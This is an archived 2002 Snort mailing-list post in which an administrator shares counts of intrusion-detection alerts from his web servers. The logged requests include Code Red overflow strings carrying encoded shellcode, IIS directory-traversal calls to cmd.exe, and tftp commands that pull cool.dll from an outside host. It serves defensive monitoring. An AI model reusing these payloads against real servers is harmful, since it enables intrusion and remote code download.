NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Snort IDS> 2002-02

From: Phil Wood (cpwlanl.gov)
Date: Sat Feb 09 2002 - 21:32:00 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

56 minutes of snort web rules alerts starting Sat Feb 9 18:52:57 MST.
The leading number is frequency. (sort file | uniq -c | sort -rn).
Check out the moron that is going to pull down cool.dll.
(No, this was not captured on my home machine.)

   6244 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   4999 GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   2514 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
   1303 GET /scripts/root.exe?/c+dir HTTP/1.0
   1290 GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1286 GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1279 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1268 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1259 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir HTTP/1.0
   1237 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   1233 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1228 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
     40 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4 GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /scripts/root.exe?/c+tftp -i 172.16.102.254 GET cool.dll httpodbc.dll podbc.dll HTTP/1.0
      1 GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
      1 GET /scripts/debug/HM_ArraysSiteMapLab_sub.js HTTP/1.1
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1 GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll 0cool.dll%20e:\httpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll 0cool.dll%20d:\httpodbc.dll HTTP/1.0
      1 GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll 0cool.dll%20c:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1 GET /intranet/pitchang_combined/1day/1997-148.html HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
      1 GET /default.ida?
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1 GET /c

Now for another beer.

_______________________________________________
Snort-users mailing list
Snort-userslists.sourceforge.net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]